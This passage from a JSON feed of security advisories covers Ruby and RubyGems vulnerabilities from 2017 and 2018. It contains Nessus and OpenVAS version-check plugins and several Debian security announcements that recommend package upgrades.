\"ruby-irb-2.0.0.648-33.h2\",\n \"ruby-libs-2.0.0.648-33.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:53:13", "description": "According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Net::FTP module did not\n properly process filenames in combination with certain\n operations. A remote attacker could exploit this flaw\n to execute arbitrary commands by setting up a malicious\n FTP server and tricking a user or Ruby application into\n downloading files with specially crafted names using\n the Net::FTP module. (CVE-2017-17405)\n\n - A buffer underflow was found in ruby's sprintf\n function. An attacker, with ability to control its\n format string parameter, could send a specially crafted\n string that would disclose heap memory or crash the\n interpreter. (CVE-2017-0898)\n\n - It was found that rubygems did not sanitize gem names\n during installation of a given gem. A specially crafted\n gem could use this flaw to install files outside of the\n regular directory. (CVE-2017-0901)\n\n - A vulnerability was found where rubygems did not\n sanitize DNS responses when requesting the hostname of\n the rubygems server for a domain, via a _rubygems._tcp\n DNS SRV query. An attacker with the ability to\n manipulate DNS responses could direct the gem command\n towards a different domain. (CVE-2017-0902)\n\n - A vulnerability was found where the rubygems module was\n vulnerable to an unsafe YAML deserialization when\n inspecting a gem. Applications inspecting gem files\n without installing them can be tricked to execute\n arbitrary code in the context of the ruby interpreter.\n (CVE-2017-0903)\n\n - It was found that WEBrick did not sanitize all its log\n messages. If logs were printed in a terminal, an\n attacker could interact with the terminal via the use\n of escape sequences. (CVE-2017-10784)\n\n - It was found that the decode method of the\n OpenSSL::ASN1 module was vulnerable to buffer underrun.\n An attacker could pass a specially crafted string to\n the application in order to crash the ruby interpreter,\n causing a denial of service. (CVE-2017-14033)\n\n - A vulnerability was found where rubygems did not\n properly sanitize gems' specification text. A specially\n crafted gem could interact with the terminal via the\n use of escape sequences. (CVE-2017-0899)\n\n - It was found that rubygems could use an excessive\n amount of CPU while parsing a sufficiently long gem\n summary. A specially crafted gem from a gem repository\n could freeze gem commands attempting to parse its\n summary. (CVE-2017-0900)\n\n - A buffer overflow vulnerability was found in the JSON\n extension of ruby. An attacker with the ability to pass\n a specially crafted JSON input to the extension could\n use this flaw to expose the interpreter's heap memory.\n (CVE-2017-14064)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 23, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-03-20T00:00:00", "title": "EulerOS 2.0 SP1 : ruby (EulerOS-SA-2018-1066)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2017-14064", "CVE-2017-0901"], "modified": "2018-03-20T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1066.NASL", "href": "https://www.tenable.com/plugins/nessus/108470", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(108470);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-0898\",\n \"CVE-2017-0899\",\n \"CVE-2017-0900\",\n \"CVE-2017-0901\",\n \"CVE-2017-0902\",\n \"CVE-2017-0903\",\n \"CVE-2017-10784\",\n \"CVE-2017-14033\",\n \"CVE-2017-14064\",\n \"CVE-2017-17405\",\n \"CVE-2017-17790\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : ruby (EulerOS-SA-2018-1066)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - It was discovered that the Net::FTP module did not\n properly process filenames in combination with certain\n operations. A remote attacker could exploit this flaw\n to execute arbitrary commands by setting up a malicious\n FTP server and tricking a user or Ruby application into\n downloading files with specially crafted names using\n the Net::FTP module. (CVE-2017-17405)\n\n - A buffer underflow was found in ruby's sprintf\n function. An attacker, with ability to control its\n format string parameter, could send a specially crafted\n string that would disclose heap memory or crash the\n interpreter. (CVE-2017-0898)\n\n - It was found that rubygems did not sanitize gem names\n during installation of a given gem. A specially crafted\n gem could use this flaw to install files outside of the\n regular directory. (CVE-2017-0901)\n\n - A vulnerability was found where rubygems did not\n sanitize DNS responses when requesting the hostname of\n the rubygems server for a domain, via a _rubygems._tcp\n DNS SRV query. An attacker with the ability to\n manipulate DNS responses could direct the gem command\n towards a different domain. (CVE-2017-0902)\n\n - A vulnerability was found where the rubygems module was\n vulnerable to an unsafe YAML deserialization when\n inspecting a gem. Applications inspecting gem files\n without installing them can be tricked to execute\n arbitrary code in the context of the ruby interpreter.\n (CVE-2017-0903)\n\n - It was found that WEBrick did not sanitize all its log\n messages. If logs were printed in a terminal, an\n attacker could interact with the terminal via the use\n of escape sequences. (CVE-2017-10784)\n\n - It was found that the decode method of the\n OpenSSL::ASN1 module was vulnerable to buffer underrun.\n An attacker could pass a specially crafted string to\n the application in order to crash the ruby interpreter,\n causing a denial of service. (CVE-2017-14033)\n\n - A vulnerability was found where rubygems did not\n properly sanitize gems' specification text. A specially\n crafted gem could interact with the terminal via the\n use of escape sequences. (CVE-2017-0899)\n\n - It was found that rubygems could use an excessive\n amount of CPU while parsing a sufficiently long gem\n summary. A specially crafted gem from a gem repository\n could freeze gem commands attempting to parse its\n summary. (CVE-2017-0900)\n\n - A buffer overflow vulnerability was found in the JSON\n extension of ruby. An attacker with the ability to pass\n a specially crafted JSON input to the extension could\n use this flaw to expose the interpreter's heap memory.\n (CVE-2017-14064)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1066\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3db34d7b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/03/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/03/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.648-33.h2\",\n \"ruby-irb-2.0.0.648-33.h2\",\n \"ruby-libs-2.0.0.648-33.h2\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:22:45", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901"], "description": "Package : ruby1.9.1\nVersion : 1.9.3.194-8.1+deb7u6\nCVE ID : CVE-2017-0898 CVE-2017-0899 CVE-2017-0900 CVE-2017-0901 \n CVE-2017-10784 CVE-2017-14033 CVE-2017-14064\nDebian Bug : 873802 873906 875928 875931 875936\n\nMultiple vulnerabilities were discovered in the Ruby 1.9 interpretor.\n\nCVE-2017-0898\n\n Buffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-0899\n\n ANSI escape sequence vulnerability\n\nCVE-2017-0900\n\n DOS vulernerability in the query command\n\nCVE-2017-0901\n\n gem installer allows a malicious gem to overwrite arbitrary files\n\nCVE-2017-10784\n\n Escape sequence injection vulnerability in the Basic\n authentication of WEBrick\n\nCVE-2017-14033\n\n Buffer underrun vulnerability in OpenSSL ASN1 decode\n\nCVE-2017-14064\n\n Heap exposure vulnerability in generating JSON\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.9.3.194-8.1+deb7u6.\n\nWe recommend that you upgrade your ruby1.9.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-26T21:17:14", "published": "2017-09-26T21:17:14", "id": "DEBIAN:DLA-1114-1:DA09C", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00029.html", "title": "[SECURITY] [DLA 1114-1] ruby1.9.1 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T01:05:17", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0903", "CVE-2017-10784", "CVE-2017-14033"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-4031-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nNovember 11, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby2.3\nCVE ID : CVE-2017-0898 CVE-2017-0903 CVE-2017-10784 CVE-2017-14033\nDebian Bug : 875928 875931 875936 879231\n\nSeveral vulnerabilities have been discovered in the interpreter for the\nRuby language. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2017-0898\n\n aerodudrizzt reported a buffer underrun vulnerability in the sprintf\n method of the Kernel module resulting in heap memory corruption or\n information disclosure from the heap.\n\nCVE-2017-0903\n\n Max Justicz reported that RubyGems is prone to an unsafe object\n deserialization vulnerability. When parsed by an application which\n processes gems, a specially crafted YAML formatted gem specification\n can lead to remote code execution.\n\nCVE-2017-10784\n\n Yusuke Endoh discovered an escape sequence injection vulnerability\n in the Basic authentication of WEBrick. An attacker can take\n advantage of this flaw to inject malicious escape sequences to the\n WEBrick log and potentially execute control characters on the\n victim&#x27;s terminal emulator when reading logs.\n\nCVE-2017-14033\n\n asac reported a buffer underrun vulnerability in the OpenSSL\n extension. A remote attacker can take advantage of this flaw to\n cause the Ruby interpreter to crash leading to a denial of service.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2.3.3-1+deb9u2.\n\nWe recommend that you upgrade your ruby2.3 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2017-11-11T14:46:21", "published": "2017-11-11T14:46:21", "id": "DEBIAN:DSA-4031-1:AC0D9", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00294.html", "title": "[SECURITY] [DSA 4031-1] ruby2.3 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-12T00:58:06", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0900", "CVE-2017-0899", "CVE-2016-7798", "CVE-2017-0902", "CVE-2015-9096", "CVE-2017-14064", "CVE-2017-0901"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3966-1 security@debian.org\nhttps://www.debian.org/security/ Moritz Muehlenhoff\nSeptember 05, 2017 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : ruby2.3\nCVE ID : CVE-2015-9096 CVE-2016-7798 CVE-2017-0899 CVE-2017-0900 \n CVE-2017-0901 CVE-2017-0902 CVE-2017-14064\n\nMultiple vulnerabilities were discovered in the interpreter for the Ruby\nlanguage:\n\nCVE-2015-9096\n\n SMTP command injection in Net::SMTP.\n\nCVE-2016-7798\n\n Incorrect handling of initialization vector in the GCM mode in the\n OpenSSL extension.\n\nCVE-2017-0900\n\n Denial of service in the RubyGems client.\n\nCVE-2017-0901\n\n Potential file overwrite in the RubyGems client.\n\nCVE-2017-0902\n\n DNS hijacking in the RubyGems client.\n\nCVE-2017-14064\n\n Heap memory disclosure in the JSON library.\n\nFor the stable distribution (stretch), these problems have been fixed in\nversion 2.3.3-1+deb9u1. This update also hardens RubyGems against\nmalicious termonal escape sequences (CVE-2017-0899).\n\nWe recommend that you upgrade your ruby2.3 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 10, "modified": "2017-09-05T20:18:25", "published": "2017-09-05T20:18:25", "id": "DEBIAN:DSA-3966-1:856A1", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2017/msg00228.html", "title": "[SECURITY] [DSA 3966-1] ruby2.3 security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-30T02:22:57", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-10784"], "description": "Package : ruby1.8\nVersion : 1.8.7.358-7.1+deb7u4\nCVE ID : CVE-2017-0898 CVE-2017-10784\nDebian Bug : 875931 875936\n\nSome vulnerabilities were found in the Ruby 1.8 package that affects\nthe LTS distribution.\n\nCVE-2017-0898\n\n Buffer underrun vulnerability in Kernel.sprintf\n\nCVE-2017-10784\n\n Escape sequence injection vulnerability in the Basic\n authentication of WEBrick\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.8.7.358-7.1+deb7u4.\n\nWe recommend that you upgrade your ruby1.8 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-26T21:17:16", "published": "2017-09-26T21:17:16", "id": "DEBIAN:DLA-1113-1:5D775", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00030.html", "title": "[SECURITY] [DLA 1113-1] ruby1.8 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:22:59", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0900", "CVE-2017-0901"], "description": "Package : rubygems\nVersion : 1.8.24-1+deb7u1\nCVE ID : CVE-2017-0900 CVE-2017-0901\nDebian Bug : 873802\n\nSome vulnerabilities were found in the Rubygems package that affects\nthe LTS distribution.\n\nCVE-2017-0900\n\n DOS vulernerability in the query command\n\nCVE-2017-0901\n\n gem installer allows a malicious gem to overwrite arbitrary files\n\nFor Debian 7 &quot;Wheezy&quot;, these problems have been fixed in version\n1.8.24-1+deb7u1.\n\nWe recommend that you upgrade your rubygems packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-27T02:19:56", "published": "2017-09-27T02:19:56", "id": "DEBIAN:DLA-1112-1:73A63", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00031.html", "title": "[SECURITY] [DLA 1112-1] rubygems security update", "type": "debian", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-11T01:30:44", "bulletinFamily": "unix", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2018-8778", "CVE-2017-17742", "CVE-2017-0899", "CVE-2017-10784", "CVE-2018-8780", "CVE-2018-1000078", "CVE-2016-2339", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2016-7798", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2015-9096", "CVE-2018-8777", "CVE-2017-14064", "CVE-2017-0901", "CVE-2018-8779", "CVE-2018-1000077", "CVE-2018-1000079", "CVE-2018-6914"], "description": "Package : ruby2.1\nVersion : 2.1.5-2+deb8u4\nCVE ID : CVE-2015-9096 CVE-2016-2339 CVE-2016-7798 CVE-2017-0898\n CVE-2017-0899 CVE-2017-0900 CVE-2017-0901 CVE-2017-0902\n CVE-2017-0903 CVE-2017-10784 CVE-2017-14033 CVE-2017-14064\n CVE-2017-17405 CVE-2017-17742 CVE-2017-17790 CVE-2018-6914\n CVE-2018-8777 CVE-2018-8778 CVE-2018-8779 CVE-2018-8780\n CVE-2018-1000075 CVE-2018-1000076 CVE-2018-1000077\n CVE-2018-1000078 CVE-2018-1000079\nDebian Bug : 851161\n\nMultiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2015-9096\n\n SMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\n or MAIL FROM command.\n\nCVE-2016-2339\n\n Exploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\n Incorrect handling of initialization vector in the GCM mode in the\n OpenSSL extension.\n\nCVE-2017-0898\n\n Buffer underrun vulnerability in Kernel.sprintf.\n\nCVE-2017-0899\n\n ANSI escape sequence vulnerability in RubyGems.\n\nCVE-2017-0900\n\n DoS vulnerability in the RubyGems query command.\n\nCVE-2017-0901\n\n gem installer allowed a malicious gem to overwrite arbitrary files.\n\nCVE-2017-0902\n\n RubyGems DNS request hijacking vulnerability.\n\nCVE-2017-0903\n\n Max Justicz reported that RubyGems is prone to an unsafe object\n deserialization vulnerability. When parsed by an application which\n processes gems, a specially crafted YAML formatted gem specification\n can lead to remote code execution.\n\nCVE-2017-10784\n\n Yusuke Endoh discovered an escape sequence injection vulnerability in\n the Basic authentication of WEBrick. An attacker can take advantage of\n this flaw to inject malicious escape sequences to the WEBrick log and\n potentially execute control characters on the victim&#x27;s terminal\n emulator when reading logs.\n\nCVE-2017-14033\n\n asac reported a buffer underrun vulnerability in the OpenSSL\n extension. A remote attacker could take advantage of this flaw to\n cause the Ruby interpreter to crash leading to a denial of service.\n\nCVE-2017-14064\n\n Heap memory disclosure in the JSON library.\n\nCVE-2017-17405\n\n A command injection vulnerability in Net::FTP might allow a\n malicious FTP server to execute arbitrary commands.\n\nCVE-2017-17742\n\n Aaron Patterson reported that WEBrick bundled with Ruby was vulnerable\n to an HTTP response splitting vulnerability. It was possible for an\n attacker to inject fake HTTP responses if a script accepted an\n external input and output it without modifications.\n\nCVE-2017-17790\n\n A command injection vulnerability in lib/resolv.rb&#x27;s lazy_initialze\n might allow a command injection attack. However untrusted input to\n this function is rather unlikely.\n\nCVE-2018-6914\n\n ooooooo_q discovered a directory traversal vulnerability in the\n Dir.mktmpdir method in the tmpdir library. It made it possible for\n attackers to create arbitrary directories or files via a .. (dot dot)\n in the prefix argument.\n\nCVE-2018-8777\n\n Eric Wong reported an out-of-memory DoS vulnerability related to a\n large request in WEBrick bundled with Ruby.\n\nCVE-2018-8778\n\n aerodudrizzt found a buffer under-read vulnerability in the Ruby\n String#unpack method. If a big number was passed with the specifier @,\n the number was treated as a negative value, and an out-of-buffer read\n occurred. Attackers could read data on heaps if an script accepts an\n external input as the argument of String#unpack.\n\nCVE-2018-8779\n\n ooooooo_q reported that the UNIXServer.open and UNIXSocket.open\n methods of the socket library bundled with Ruby did not check for NUL\n bytes in the path argument. The lack of check made the methods\n vulnerable to unintentional socket creation and unintentional socket\n access.\n\nCVE-2018-8780\n\n ooooooo_q discovered an unintentional directory traversal in\n some methods in Dir, by the lack of checking for NUL bytes in their\n parameter.\n\nCVE-2018-1000075\n\n A negative size vulnerability in ruby gem package tar header that could\n cause an infinite loop.\n\nCVE-2018-1000076\n\n RubyGems package improperly verifies cryptographic signatures. A mis-signed\n gem could be installed if the tarball contains multiple gem signatures.\n\nCVE-2018-1000077\n\n An improper input validation vulnerability in RubyGems specification\n homepage attribute could allow malicious gem to set an invalid homepage\n URL.\n\nCVE-2018-1000078\n\n Cross Site Scripting (XSS) vulnerability in gem server display of homepage\n attribute.\n\nCVE-2018-1000079\n\n Path Traversal vulnerability during gem installation.\n\nFor Debian 8 &quot;Jessie&quot;, these problems have been fixed in version\n2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-07-14T06:29:07", "published": "2018-07-14T06:29:07", "id": "DEBIAN:DLA-1421-1:5BC60", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201807/msg00012.html", "title": "[SECURITY] [DLA 1421-1] ruby2.1 security update", "type": "debian", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:33:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-0899", "CVE-2017-10784", "CVE-2017-14033", "CVE-2017-14064", "CVE-2017-0901", "CVE-2017-10748"], "description": "The remote host is missing an update for the ", "modified": "2019-03-18T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310843791", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843791", "type": "openvas", "title": "Ubuntu Update for ruby1.9.1 USN-3439-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3439_1.nasl 14288 2019-03-18 16:34:17Z cfischer $\n#\n# Ubuntu Update for ruby1.9.1 USN-3439-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843791\");\n script_version(\"$Revision: 14288 $\");\n script_cve_id(\"CVE-2017-0898\", \"CVE-2017-0899\", \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-10784\", \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-10748\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 17:34:17 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:20:37 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"Ubuntu Update for ruby1.9.1 USN-3439-1\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n script_xref(name:\"USN\", value:\"3439-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3439-1/\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ruby1.9.1'\n package(s) announced via the USN-3439-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a buffer overrun.\n(CVE-2017-0898)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to execute terminal escape sequences.\n(CVE-2017-0899)\n\nYusuke Endoh discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a denial of service.\n(CVE-2017-0900)\n\nIt was discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to overwrite any file on the filesystem.\n(CVE-2017-0901)\n\nIt was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to execute arbitrary code.\n(CVE-2017-10784)\n\nIt was discovered that Ruby incorrectly handled certain inputs.\nAn attacker could use this to cause a denial of service.\n(CVE-2017-14033)\n\nIt was discovered that Ruby incorrectly handled certain files.\nAn attacker could use this to expose sensitive information.\n(CVE-2017-14064)\");\n\n script_tag(name:\"affected\", value:\"ruby1.9.1 on Ubuntu 14.04 LTS.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.1\", ver:\"1.9.3.484-2ubuntu1.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"ruby1.9.3\", ver:\"1.9.3.484-2ubuntu1.5\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 9.3, "vector": 